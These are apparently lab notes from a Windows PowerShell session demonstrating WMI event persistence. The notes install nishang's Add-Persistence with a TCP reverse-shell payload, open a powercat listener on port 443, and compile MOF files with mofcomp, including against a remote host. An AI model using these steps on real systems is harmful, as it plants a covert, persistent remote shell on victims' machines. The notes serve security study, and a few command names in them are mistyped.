WMI Events

Extrinsic events:

https://github.com/KurtDeGreeff/PlayPowershell

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) {get-wmiobject -namespace $ns -list | where {$_._SUPERCLASS -eq ‘ ExtrinsicEvent’}

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -class win32_perfFormattedData_PerfOS_System

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence –examples

PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Remove-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-Persistence -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadScript C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Shells\Invoke-PowerShellTcpOneLine.ps1 –verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> notepad.exe .\Remove-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> gwmi __eventFilter -namespace root\subscription -filter “name=’WindowsSanity'”

On another powershell session:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master> cd .\powercat-master\

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> . .\powercat.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> powercat -l -v -p 443 -t 1000

WMI Events – permanent event consumers:

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> Get-WmiObject -class win32_perfformatteddata_perfos_system

MOF Files:

mofcomp.ee c:\test\test.mof

mofcomp.exe –autorecover c:\test\test.mof

mofconf.exe –N \\192.168.222.144\root\subscription c:\test\test.mof

Now on cmd :

Open the cmd.exe

C:\Windows\system32>cd wbem

C:\Windows\System32\wbem>mofcomp.exe c:\users\victim6\Downloads\test.mof

It create a test file. Now open that file on notepad.

Now try this

PS C:\Users\victim6\Downloads\new\new\tool\tool\powercat-master\powercat-master> gwmi __eventfilter -namespace root\subscription

We can see the test file in the output which we created earlier.

@Saksham Dixit